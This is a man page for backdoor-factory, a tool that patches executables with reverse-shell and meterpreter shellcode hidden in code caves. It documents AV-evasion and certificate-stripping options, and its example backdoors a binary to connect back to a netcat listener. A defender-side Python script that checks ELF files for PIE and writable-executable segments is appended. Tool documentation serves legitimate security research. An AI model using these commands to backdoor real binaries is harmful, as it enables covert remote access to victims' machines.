.TH "BACKDOOR-FACTORY" "1" " Backdoor-Factory Man Page" "Philippe Thierry" "May 2017"
.nh
.ad l
.SH NAME
.PP
backdoor\-factory \- inject predefined or user\-defined shellcode in binaries
.SH SYNOPSIS
.PP
\fBbackdoor\-factory [options]\fP
.SH DESCRIPTION
.PP
\fBbackdoor\-factory\fP patches executable binaries with user\-desired shellcode and continues normal execution of the prepatched state.
.PP
This tool is for security professionals and researchers only.
.PP
This tool doesn't support relocatable ELF executables (i.e. compiled with the \-fPIE option, suggested by the Debian hardening requirements, see \fB\fChttps://wiki.debian.org/Hardening\fR).
.PP
Binaries such as ssh may not be caved correctly, whereas binaries such as dolphin (at the time this man page was written) are.
.SH OPTIONS
.PP
\fB\-h\fP, \fB\-\-help\fP
show this help message and exit
.PP
\fB\-f FILE\fP, \fB\-\-file=FILE\fP
File to backdoor
.PP
\fB\-s SHELL\fP, \fB\-\-shell=SHELL\fP
Payloads that are available for use. Use 'show' to see payloads.
.PP
\fB\-H HOST\fP, \fB\-\-hostip=HOST\fP
IP of the C2 for reverse connections.
.PP
\fB\-P PORT\fP, \fB\-\-port=PORT\fP
The port to either connect back to for reverse shells or to listen on for bind shells
.PP
\fB\-J\fP, \fB\-\-cave\_jumping\fP
Select this option if you want to use code cave jumping to further hide your shellcode in the binary.
.PP
\fB\-a\fP, \fB\-\-add\_new\_section\fP
Mandates that a new section be added to the exe (better success) but less AV avoidance
.PP
\fB\-U SUPPLIED\_SHELLCODE\fP, \fB\-\-user\_shellcode=SUPPLIED\_SHELLCODE\fP
User supplied shellcode; make sure that it matches the architecture that you are targeting.
.PP
\fB\-c\fP, \fB\-\-cave\fP
The cave flag will find code caves that can be used for stashing shellcode. This will print all the code caves of a specific size. The \-l flag can be used with this setting.
.PP
\fB\-l SHELL\_LEN\fP, \fB\-\-shell\_length=SHELL\_LEN\fP
For use with \-c to help find code caves of different sizes
.PP
\fB\-o OUTPUT\fP, \fB\-\-output\-file=OUTPUT\fP
The backdoor output file path. Parent dir(s) must exist
.PP
\fB\-n NSECTION\fP, \fB\-\-section=NSECTION\fP
New section name; must be less than seven characters
.PP
\fB\-d DIR\fP, \fB\-\-directory=DIR\fP
This is the location of the files that you want to backdoor. You can make backdooring a directory of files faster by forcing a code cave to be attached to the exe with the \-a setting.
.PP
\fB\-w\fP, \fB\-\-change\_access\fP
This flag changes the section that houses the code cave to RWE. Sometimes this is necessary. Enabled by default. If disabled, the backdoor may fail.
.PP
\fB\-i\fP, \fB\-\-injector\fP
This command turns backdoor\-factory into a hunt\-and\-inject type of mechanism. Edit the target settings in the injector module.
.PP
\fB\-u SUFFIX\fP, \fB\-\-suffix=SUFFIX\fP
For use with injector; places a suffix on the original file for easy recovery
.PP
\fB\-D\fP, \fB\-\-delete\_original\fP
For use with injector module. This command deletes the original file. Not for use in production systems. (Author not responsible for stupid uses.)
.PP
\fB\-O DISK\_OFFSET\fP, \fB\-\-disk\_offset=DISK\_OFFSET\fP
Starting on\-disk offset, in bytes. Some authors obfuscate their on\-disk offset to hinder reverse engineering; if you find one of those files, use this flag once you have found the offset.
.PP
\fB\-S\fP, \fB\-\-support\_check\fP
Determines if the file is supported by BDF prior to backdooring the file. For use by itself or with verbose. This check happens automatically if backdooring is attempted.
.PP
\fB\-M\fP, \fB\-\-cave\-miner\fP
Future use, to help determine the smallest shellcode possible in a PE file
.PP
\fB\-q\fP, \fB\-\-no\_banner\fP
Kills the banner.
.PP
\fB\-v\fP, \fB\-\-verbose\fP
For debug information output.
.PP
\fB\-T IMAGE\_TYPE\fP, \fB\-\-image\-type=IMAGE\_TYPE\fP
ALL, x86, or x64 type binaries only. Default=ALL
.PP
\fB\-Z\fP, \fB\-\-zero\_cert\fP
Allows for the overwriting of the pointer to the PE certificate table, effectively removing the certificate from the binary for all intents and purposes.
.PP
\fB\-R\fP, \fB\-\-runas\_admin\fP
EXPERIMENTAL. Checks the PE binaries for 'requestedExecutionLevel level="highestAvailable"'. If this string is included in the binary, it must run as system/admin. If not in Support Check mode it will attempt to patch highestAvailable into the manifest if a requestedExecutionLevel entry exists.
.PP
\fB\-L\fP, \fB\-\-patch\_dll\fP
Use this setting if you DON'T want to patch DLLs. Patches by default.
.PP
\fB\-F FAT\_PRIORITY\fP, \fB\-\-fat\_priority=FAT\_PRIORITY\fP
For MACH\-O format. If fat file, focus on which arch to patch. Default is x64. To force x86 use \-F x86; to force both archs use \-F ALL.
.PP
\fB\-B BEACON\fP, \fB\-\-beacon=BEACON\fP
For payloads that have the ability to beacon out, set the time in secs
.PP
\fB\-m PATCH\_METHOD\fP, \fB\-\-patch\-method=PATCH\_METHOD\fP
Patching methods for PE files: 'manual', 'automatic', 'replace' and 'onionduke'
.PP
\fB\-b SUPPLIED\_BINARY\fP, \fB\-\-user\_malware=SUPPLIED\_BINARY\fP
For onionduke. Provide your desired binary.
.PP
\fB\-X\fP, \fB\-\-xp\_mode\fP
Default: no support for XP legacy machines; use \-X to support XP. By default the binary will crash on XP machines (e.g. sandboxes)
.PP
\fB\-A\fP, \fB\-\-idt\_in\_cave\fP
EXPERIMENTAL. By default a new Import Directory Table is created in a new section; by calling this flag it will be put in a code cave. This can cause binary failure in some cases. Test on target binaries first.
.PP
\fB\-C\fP, \fB\-\-code\_sign\fP
For those with code\-signing certs wishing to sign PE binaries only. Name your signing certificate and private key signingcert.cer and signingPrivateKey.pem respectively in the certs directory; it's up to you to obtain signing certs.
.PP
\fB\-p\fP, \fB\-\-preprocess\fP
To execute preprocessing scripts in the preprocess directory
.SH ABOUT THE SHELLCODES
.PP
There are various predefined shellcodes in backdoor\-factory. Their availability depends on the target type (ELF32, ELF64, PE32...). The shellcode list is given below.
.SH for all intel\-based (x86 and x86\_64 architecture)
.PP
\fBreverse\_shell\_tcp\fP
needs: a remote host and port to be set
permits: remote shell access
.PP
\fBdelay\_reverse\_shell\_tcp\fP
needs: a remote host and port to be set
permits: remote shell access
.PP
\fBbeaconing\_reverse\_shell\_tcp\fP
needs: a beacon, a remote host and port to be set
permits: remote shell access
.PP
\fBuser\_supplied\_shellcode\fP
needs: a user\-defined shellcode ready to inject
permits: depends on the shellcode
.SH Linux specific shellcodes
.PP
\fBreverse\_tcp\_stager\fP
needs:
permits:
.SH Windows PE32 exe shellcodes
.PP
\fBreverse\_shell\_tcp\_inline\fP
needs: a remote host and port to be set
permits: remote shell access
.PP
\fBreverse\_shell\_tcp\_stager\_threaded\fP
needs: a remote host and port to be set
permits: inject the meterpreter server DLL via the Reflective DLL Injection payload
.PP
\fBmeterpreter\_reverse\_https\_threaded\fP
needs: a remote host and port to be set
permits: meterpreter over https transport
.PP
\fBuser\_applied\_shellcode\_threaded\fP
needs: a user\-defined shellcode ready to inject
permits: depends on the shellcode
.PP
\fBiat\_reverse\_tcp\_inline\fP
needs: a remote host and port to be set
permits:
.PP
\fBiat\_reverse\_tcp\_inline\_threaded\fP
needs: a remote host and port to be set
permits:
.PP
\fBiat\_reverse\_tcp\_stager\_threaded\fP
needs: a remote host and port to be set
permits: inject the meterpreter server DLL via the Reflective DLL Injection payload
.PP
\fBiat\_user\_applied\_shellcode\_threaded\fP
needs: a user\-defined shellcode ready to inject
permits: depends on the shellcode
.SH Windows PE64 exe shellcodes
.PP
\fBdelay\_reverse\_shell\_tcp\fP
needs: a remote host and port to be set
permits: remote shell access
.PP
\fBreverse\_shell\_tcp\fP
needs: a remote host and port to be set
permits: remote shell access
.PP
\fBbeaconing\_reverse\_shell\_tcp\fP
needs: a beacon, a remote host and port to be set
permits: remote shell access
.PP
\fBuser\_supplied\_shellcode\fP
needs: a user\-defined shellcode ready to inject
permits: depends on the shellcode
.SH EXAMPLES
.PP
Example of code\-caving an ELF binary, integrating remote shell access through a remote TCP listener (e.g. netcat):
.PP
\fB\fCbackdoor\-factory \-f /usr/bin/dolphin \-H 172.16.0.15 \-P 8080 \-s reverse\_shell\_tcp\fR
.PP
On the host behind the IP 172.16.0.15, start netcat in listen mode:
.PP
\fB\fC$ netcat \-l 172.16.0.15 8080\fR
.PP
On the target, start the backdoored binary:
\fB\fC\&./backdoored/dolphin\fR
.PP
Now, on the host 172.16.0.15, just use your shell.
.SH HISTORY
.PP
May 2017, originally compiled by Philippe Thierry (phil at reseau\-libre dot com)
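.SH NOTE ON CHECKING BINARIES
.PP
The DESCRIPTION states that the tool cannot patch PIE executables, and the \-w option notes that the section housing a code cave is made RWE. The Python script below is added here as a defender\-side check and is not part of backdoor\-factory or the original man page: it reports whether an ELF is position\-independent and whether any loadable segment is mapped writable and executable (extending the page's RWE remark, made for PE sections, to ELF program headers). It assumes only the standard ELF32/ELF64 header layout; the sample image it builds is constructed for the demonstration.

```python
import struct
import sys

ET_DYN, PT_LOAD, PF_X, PF_W = 3, 1, 1, 2          # ELF constants from the spec

def inspect_elf(data):
    """Return (is_pie, [indexes of PT_LOAD segments mapped writable + executable])."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    cls, end = data[4], "<" if data[5] == 1 else ">"   # EI_CLASS, EI_DATA
    e_type, = struct.unpack_from(end + "H", data, 16)
    if cls == 2:    # ELF64 header field offsets
        e_phoff, = struct.unpack_from(end + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
    elif cls == 1:  # ELF32 header field offsets
        e_phoff, = struct.unpack_from(end + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
    else:
        raise ValueError("unknown ELF class")
    wx = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, = struct.unpack_from(end + "I", data, off)
        # p_flags directly follows p_type in ELF64 but sits at offset 24 in ELF32
        p_flags, = struct.unpack_from(end + "I", data, off + (4 if cls == 2 else 24))
        if p_type == PT_LOAD and p_flags & PF_W and p_flags & PF_X:
            wx.append(i)
    return e_type == ET_DYN, wx

def build_sample_elf64(e_type, seg_flags):
    """Construct a minimal little-endian ELF64 image: header plus PT_LOAD headers only."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)
    hdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0x401000,
                              64, 0, 0, 64, 56, len(seg_flags), 64, 0, 0)
    phdrs = b"".join(struct.pack("<IIQQQQQQ", PT_LOAD, f, 0, 0x400000, 0x400000,
                                 0x1000, 0x1000, 0x1000) for f in seg_flags)
    return hdr + phdrs

if __name__ == "__main__":
    # With a path argument, inspect that file; otherwise use the constructed sample
    # (non-PIE, with one R+X and one R+W+X segment).
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf64(2, [5, 7])
    is_pie, wx = inspect_elf(data)
    print("PIE:", is_pie, "| W+X PT_LOAD segments:", wx)
```

A fixed\-position executable with a W+X segment is the shape of binary this page describes as patchable; a PIE with no W+X segment is what the Debian hardening link recommends.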